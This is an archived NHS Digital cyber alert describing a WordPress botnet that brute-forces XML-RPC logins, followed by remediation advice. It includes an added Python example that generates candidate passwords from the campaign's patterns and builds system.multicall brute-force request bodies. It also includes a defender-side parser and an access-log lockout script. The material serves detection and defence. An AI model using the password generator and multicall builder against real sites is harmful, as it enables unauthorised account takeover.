WordPress Botnet Campaign
This content has been archived
This article no longer conforms to NHS Digital's standards for cyber alerts and may contain outdated or inaccurate information. Use of the information contained in this page is at your own risk.
Summary
Security researchers have observed a botnet of over 20,000 infected WordPress websites being utilised to conduct cyber attacks against other WordPress websites.
Affected platforms
The following platforms are known to be affected:
- WordPress (any version with the XML-RPC interface enabled; version 4.3 and earlier additionally allow many login attempts to be packed into a single request)
Threat details
The infected websites are attempting to gain access to privileged accounts on other WordPress websites by brute-forcing authentication against /xmlrpc.php (the XML-RPC interface). Four command and control (C2) servers send attack instructions to thousands of proxy servers, which relay them to the infected WordPress websites; the infected sites then make the login attempts. The requests carry user agent strings matching applications that commonly interact with the XML-RPC interface, such as wp-iPhone and wp-android, so they do not stand out on user agent alone.
The attack scripts generate candidate passwords for each target account from common patterns such as %domainPattern%, %userName%, %userName%1, %userName%123, %userName%2018, %userName%2017 and %userName%2016. In WordPress version 4.3 and earlier, the XML-RPC system.multicall method lets the threat actors test a large number of username/password pairs in a single HTTP request, which speeds up the attack and sidesteps per-request rate limiting. Since WordPress version 4.4, once one login attempt in an XML-RPC request fails, every subsequent attempt within the same request also fails regardless of the credentials supplied. The attack scripts detect this behaviour and fall back to testing a single username/password combination per request.
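The following is an added example, not code from this alert or from the researchers who reported the botnet. It expands the quoted password patterns for one target account, builds the kind of XML-RPC system.multicall request described above, and then parses such a body the way a server-side filter could, to count the login attempts packed into one request. Two things are assumptions: how %domainPattern% is expanded (the alert does not define it), and that wp.getUsersBlogs is the method used as the login oracle (the alert names no method; any authenticating XML-RPC method works the same way).

```python
"""Added example (not from the NHS Digital alert or the researchers'
code): password-pattern expansion, the multicall request shape, and a
defender-side parser that counts the login attempts a body carries."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Patterns quoted in the alert. The %domainPattern% expansion below is an
# assumption: the registrable label of the host, e.g. "example" for
# www.example.org.
PATTERNS = ["%domainPattern%", "%userName%", "%userName%1", "%userName%123",
            "%userName%2018", "%userName%2017", "%userName%2016"]

# XML-RPC methods that take a username/password pair and so serve as a
# login oracle. All exist in WordPress core; the list is illustrative.
AUTH_METHODS = {"wp.getUsersBlogs", "wp.getProfile", "wp.getPosts",
                "wp.getUsers", "metaWeblog.getUsersBlogs",
                "blogger.getUsersBlogs"}


def candidate_passwords(username, hostname):
    """Expand PATTERNS for one account on one site."""
    host = hostname.lower()
    if host.startswith("www."):
        host = host[4:]
    domain_label = host.split(".")[0]
    return [p.replace("%domainPattern%", domain_label)
             .replace("%userName%", username) for p in PATTERNS]


def _call_struct(method, username, password):
    # One entry of the array passed to system.multicall.
    return ("<value><struct>"
            "<member><name>methodName</name>"
            f"<value><string>{escape(method)}</string></value></member>"
            "<member><name>params</name><value><array><data>"
            f"<value><string>{escape(username)}</string></value>"
            f"<value><string>{escape(password)}</string></value>"
            "</data></array></value></member>"
            "</struct></value>")


def build_multicall(username, passwords, method="wp.getUsersBlogs"):
    """One HTTP request carrying len(passwords) login attempts."""
    calls = "".join(_call_struct(method, username, pw) for pw in passwords)
    return ('<?xml version="1.0"?><methodCall>'
            "<methodName>system.multicall</methodName>"
            "<params><param><value><array><data>" + calls +
            "</data></array></value></param></params></methodCall>")


def build_single(username, password, method="wp.getUsersBlogs"):
    """The one-pair-per-request form the scripts fall back to on 4.4+."""
    return ('<?xml version="1.0"?><methodCall>'
            f"<methodName>{escape(method)}</methodName><params>"
            f"<param><value><string>{escape(username)}</string></value></param>"
            f"<param><value><string>{escape(password)}</string></value></param>"
            "</params></methodCall>")


def count_login_attempts(body):
    """Return (top-level method, number of authenticating calls inside).

    Malformed XML counts as zero attempts; a WAF would normally reject it
    outright rather than forward it to WordPress."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "", 0
    method = root.findtext("methodName") or ""
    if method != "system.multicall":
        return method, int(method in AUTH_METHODS)
    attempts = 0
    for member in root.iter("member"):
        if (member.findtext("name") == "methodName"
                and member.findtext("value/string") in AUTH_METHODS):
            attempts += 1
    return method, attempts


def is_multicall_brute_force(body, limit=1):
    """True when a request packs more authenticating calls than `limit`.
    Rejecting such bodies at the edge gives pre-4.4 sites the 4.4
    behaviour without waiting for an upgrade."""
    method, attempts = count_login_attempts(body)
    return method == "system.multicall" and attempts > limit
```

A filter built on is_multicall_brute_force only removes the amplification; the single-pair fallback the alert describes still arrives one request at a time and has to be handled by rate limiting and lockouts.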
Remediation
To help prevent and detect an attack, website administrators should consider the following actions:
- Keep WordPress installations up to date. Version 4.4 or later defeats multicall brute forcing, but does not stop single-pair attempts.
- Disable the XML-RPC interface if it is not required, or block access to /xmlrpc.php at the web server or WAF.
- Implement restrictions and lockouts for failed logins, covering the XML-RPC interface as well as wp-login.php.
- Enforce strong, unique passwords on privileged accounts; the candidate passwords in this campaign are derived from the username and the site's domain.
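As an added example of the detection and lockout side of the list above (not part of the original alert), the script below runs over constructed Apache combined-format access-log lines, flags sources that post to /xmlrpc.php with the mobile-app style user agents named in the threat details faster than a threshold, and also measures the site-wide rate, because the campaign's use of thousands of proxies means each source may stay under a per-IP threshold. The IP addresses, user agent strings and the 5-per-60-seconds threshold are assumptions chosen for the example.

```python
"""Added example (not from the NHS Digital alert): per-source lockout
decisions and a site-wide rate over constructed access-log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines. IPs come from documentation ranges; the
# user agents are shaped like the wp-iphone / wp-android strings the
# alert mentions. Note every failed XML-RPC login still returns HTTP 200.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Dec/2018:10:15:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "wp-iphone/2.6"
203.0.113.10 - - [07/Dec/2018:10:15:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "wp-iphone/2.6"
203.0.113.10 - - [07/Dec/2018:10:15:04 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "wp-android/2.6"
203.0.113.10 - - [07/Dec/2018:10:15:05 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "wp-android/2.6"
203.0.113.10 - - [07/Dec/2018:10:15:07 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "wp-iphone/2.6"
198.51.100.7 - - [07/Dec/2018:10:15:30 +0000] "POST /xmlrpc.php HTTP/1.1" 200 9123 "-" "wp-iphone/11.5"
198.51.100.7 - - [07/Dec/2018:10:16:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2101 "-" "Mozilla/5.0"
192.0.2.44 - - [07/Dec/2018:10:16:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"')
SUSPECT_UA = re.compile(r"^wp-(iphone|android)", re.IGNORECASE)


def parse_line(line):
    """Combined-format line -> dict, or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def xmlrpc_auth_events(log_text):
    """Yield (ip, ts) for POST /xmlrpc.php with a mobile-app style UA.

    The status code is deliberately ignored: WordPress answers a failed
    XML-RPC login with HTTP 200 and a fault inside the response body, so
    status alone cannot separate failed from successful attempts."""
    for line in log_text.splitlines():
        rec = parse_line(line)
        if (rec and rec["method"] == "POST"
                and rec["path"].split("?")[0] == "/xmlrpc.php"
                and SUSPECT_UA.match(rec["ua"])):
            yield rec["ip"], rec["ts"]


def lockout_candidates(log_text, threshold=5, window_seconds=60):
    """Return {ip: time the threshold was first crossed} for sources that
    send `threshold` or more suspect XML-RPC posts within `window_seconds`."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)
    tripped = {}
    for ip, ts in sorted(xmlrpc_auth_events(log_text), key=lambda e: e[1]):
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ip not in tripped:
            tripped[ip] = ts
    return tripped


def peak_site_wide_rate(log_text, window_seconds=60):
    """Highest number of suspect XML-RPC posts in any window across all
    sources. This catches the distributed case, where each proxy stays
    below the per-IP threshold but the site as a whole is under attack."""
    window = timedelta(seconds=window_seconds)
    q = deque()
    peak = 0
    for ts in sorted(ts for _, ts in xmlrpc_auth_events(log_text)):
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        peak = max(peak, len(q))
    return peak
```

On the sample data only 203.0.113.10 trips the per-IP lockout, while the site-wide count shows six suspect posts inside one minute; in a real deployment the second number is the one to alert on, since the per-IP rule can be defeated simply by spreading the attempts over more proxies.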
Last edited: 7 September 2021 1:55 pm